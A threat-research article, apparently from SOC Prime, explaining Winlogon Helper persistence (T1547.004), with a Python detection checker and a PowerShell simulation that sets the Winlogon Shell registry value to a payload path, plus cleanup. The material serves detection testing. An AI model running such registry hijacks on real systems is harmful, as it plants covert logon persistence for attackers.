SOC Prime

26 Mar 2026 16:24

T1547.004 in MITRE ATT&CK: Winlogon Helper Explained

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Summary

The article explains the Winlogon Helper DLL persistence method tracked as T1547.004 and shows how adversaries tamper with Winlogon registry keys to load malicious code during user logon. It references real-world examples tied to the ToyBraker campaign, KamiKakaBot malware, and a sample known as Mandela.exe. The emphasis is on registry changes that trigger automatic execution of malicious DLLs or executables when a system starts or a user signs in.

Investigation

Researchers documented attackers creating unauthorized user accounts and altering Winlogon registry values such as LegalNoticeText, DefaultUserName, AutoLogonCount, and Shell to preserve access. Malware samples and intrusion cases also showed use of command-line tools like net user and reg add to inject malicious settings and launch PowerShell payloads during the login process.

Mitigation

Defenders should closely monitor and restrict modifications to Winlogon registry keys, apply least-privilege controls to account creation, and use application control to block untrusted or unsigned DLLs. Regular reviews of scheduled tasks, services, and startup locations can further help identify unauthorized persistence changes.
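One way to turn the monitoring above into detection logic, as an added example that is not SOC Prime's or the article's code: a small Python checker over constructed records shaped like Sysmon Event ID 13 (registry value set) that flags Winlogon Shell and Userinit values deviating from an assumed stock baseline, writes under the legacy Notify subkey, and autologon values. The field names follow Sysmon's EventData; the baseline values and sample events are assumptions to tune per image.

```python
"""Flag Winlogon registry writes that deviate from a known-good baseline.
Added example, not the article's code: runs over constructed records shaped like
Sysmon Event ID 13 (value set). Baseline values are assumed stock defaults.
"""
import re

WINLOGON_KEY = re.compile(r"\\Windows NT\\CurrentVersion\\Winlogon\\", re.I)
# Assumed stock defaults (compared case-insensitively); tune per image.
EXPECTED = {
    "Shell": {"explorer.exe"},
    "Userinit": {r"C:\Windows\system32\userinit.exe,"},
}
# Autologon settings that rarely change legitimately on a workstation.
ALWAYS_ALERT = {"AutoLogonCount", "DefaultUserName", "DefaultPassword"}

def evaluate(event):
    """Return (severity, reason) for one EID 13 record, or None if benign."""
    target = event.get("TargetObject", "")
    if not WINLOGON_KEY.search(target):
        return None                     # not under the Winlogon key
    name = target.rsplit("\\", 1)[-1]   # value name, e.g. "Shell"
    details = event.get("Details", "").strip()
    if name in EXPECTED:
        if details.lower() in {v.lower() for v in EXPECTED[name]}:
            return None
        return ("high", f"{name} set to {details!r} by {event.get('Image')}")
    if "\\winlogon\\notify\\" in target.lower():   # legacy Notify packages
        return ("high", f"Notify package registered: {name}={details!r}")
    if name in ALWAYS_ALERT:
        return ("medium", f"{name} written by {event.get('Image')}")
    return None

def scan(events):
    """Return [(EventRecordID, severity, reason), ...] for flagged events."""
    return [(e["EventRecordID"], *hit) for e in events if (hit := evaluate(e))]

WL = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
SAMPLE_EVENTS = [  # constructed sample telemetry, not captured from a host
    {"EventRecordID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": WL + r"\Shell", "Details": "explorer.exe"},
    {"EventRecordID": 2, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": WL + r"\Shell", "Details": r"explorer.exe,C:\Temp\evil.exe"},
    {"EventRecordID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": WL + r"\AutoLogonCount", "Details": "DWORD (0x00000001)"},
    {"EventRecordID": 4, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": WL + r"\Notify\evil\DLLName", "Details": r"C:\Temp\evil.dll"},
    {"EventRecordID": 5, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\OneDrive\OneDrive.exe"},
]
```

Running `scan(SAMPLE_EVENTS)` flags records 2, 3 and 4 and leaves the default Shell write and the unrelated Run key alone; a comma-separated Shell such as record 2 is caught because it no longer equals the baseline exactly.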

Response

When suspicious Winlogon registry activity is discovered, isolate the affected endpoint, capture volatile evidence, and restore the modified registry values to a known-good state. A forensic investigation should then look for any additional persistence mechanisms and scan the host for related malware components.

Attack Flow

    graph TB
        %% Class Definitions Section
        classDef action fill:#99ccff
        classDef tool fill:#ffcc99
        classDef persistence fill:#c2f0c2
        classDef technique fill:#ffd699
        classDef malware fill:#f4a6a6

        %% Node definitions
        action_create_account["<b>Action</b> – Create Local Account<br/><b>Technique</b>: T1136.001 Create Account: Local Account<br/><b>Description</b>: Adds a new local user using net user command."]
        class action_create_account action
        tool_net_user["<b>Tool</b> – net user command<br/><b>Purpose</b>: Create or modify local Windows accounts."]
        class tool_net_user tool
        action_modify_registry["<b>Action</b> – Modify Winlogon Registry<br/><b>Technique</b>: T1112 Modify Registry<br/><b>Description</b>: Alters Winlogon keys (Notify, Userinit, Shell, DefaultUserName, AutoLogonCount) via reg add."]
        class action_modify_registry action
        tool_reg_add["<b>Tool</b> – reg add command<br/><b>Purpose</b>: Add or change Windows registry values."]
        class tool_reg_add tool
        persistence_winlogon_helper["<b>Persistence</b> – Winlogon Helper DLL<br/><b>Technique</b>: T1547.004 Winlogon Helper DLL<br/><b>Description</b>: Loads malicious DLL or executable during user logon, providing elevated execution."]
        class persistence_winlogon_helper persistence
        technique_T1547_004["<b>Technique</b> – T1547.004<br/><b>Name</b>: Winlogon Helper DLL<br/><b>Description</b>: Registers a DLL to be loaded by Winlogon, granting persistence and privilege escalation."]
        class technique_T1547_004 technique
        malware_kamkaka["<b>Malware</b> – KamiKakaBot<br/><b>Uses</b>: Winlogon Helper DLL persistence."]
        class malware_kamkaka malware
        malware_mandela["<b>Malware</b> – Mandela.exe<br/><b>Uses</b>: Winlogon Helper DLL persistence."]
        class malware_mandela malware

        %% Connections showing flow
        action_create_account -->|uses| tool_net_user
        action_modify_registry -->|uses| tool_reg_add
        action_create_account -->|enables| persistence_winlogon_helper
        action_modify_registry -->|enables| persistence_winlogon_helper
        persistence_winlogon_helper -->|implements| technique_T1547_004
        technique_T1547_004 -->|observed_in| malware_kamkaka
        technique_T1547_004 -->|observed_in| malware_mandela

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (T1547.004) designed to trigger the detection rule. The commands and narrative directly produce the telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An attacker who has obtained local admin rights wants persistence across reboots. They choose the classic Winlogon “Shell” hijack because it runs before the user desktop loads and evades many endpoint AV products. The steps are:

    1. Create a malicious payload (e.g., C:\Temp\evil.exe).
    2. Add a new value to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell pointing to the payload.
    3. Verify the change took effect, then log off/on to achieve execution.
  • Regression Test Script:

    #-------------------------------------------------
    # Regression Test – Winlogon Shell Hijack (T1547.004)
    #-------------------------------------------------
    param(
        [string]$PayloadPath = "C:\Temp\evil.exe",
        [string]$BackupPath = "$env:Temp\winlogon_shell_backup.txt"
    )
    
    # 1. Deploy a dummy payload (a simple calc.exe copy for demo)
    if (-not (Test-Path $PayloadPath)) {
        # Make sure the target directory exists before copying
        New-Item -ItemType Directory -Path (Split-Path $PayloadPath) -Force | Out-Null
        Copy-Item "$env:SystemRoot\System32\calc.exe" $PayloadPath -Force
    }
    
    # 2. Backup current Shell value (if any)
    $regPath = "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
    $currentShell = (Get-ItemProperty -Path $regPath -Name Shell -ErrorAction SilentlyContinue).Shell
    # -NoNewline keeps the backup identical to the registry value, so the cleanup
    # script does not restore "explorer.exe" with a trailing line break appended
    Set-Content -Path $BackupPath -Value $currentShell -Encoding UTF8 -NoNewline
    
    # 3. Set malicious Shell value
    Set-ItemProperty -Path $regPath -Name Shell -Value $PayloadPath -Force
    
    Write-Host "[+] Malicious Winlogon Shell set to $PayloadPath"
    Write-Host "[+] Original value saved to $BackupPath"
  • Cleanup Commands:

    #---------------------------------
    # Cleanup – Restore Winlogon Shell
    #---------------------------------
    # Run in the same user context as the regression test so $env:Temp resolves
    # to the same directory and the backup file is found
    $regPath = "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
    $backupFile = "$env:Temp\winlogon_shell_backup.txt"
    
    if (Test-Path $backupFile) {
        # Trim any trailing line break Set-Content may have added; a Shell value of
        # "explorer.exe`r`n" would leave the user without a desktop at next logon.
        # The string wrapper turns an empty file ($null) into "" so Trim() cannot fail.
        $original = "$(Get-Content -Path $backupFile -Raw)".Trim()
        if ([string]::IsNullOrWhiteSpace($original)) {
            # Original value was empty – remove the property
            Remove-ItemProperty -Path $regPath -Name Shell -ErrorAction SilentlyContinue
        } else {
            Set-ItemProperty -Path $regPath -Name Shell -Value $original -Force
        }
        Remove-Item $backupFile -Force
        Write-Host "[+] Winlogon Shell restored to original state."
    } else {
        Write-Warning "Backup file not found – manual inspection required."
    }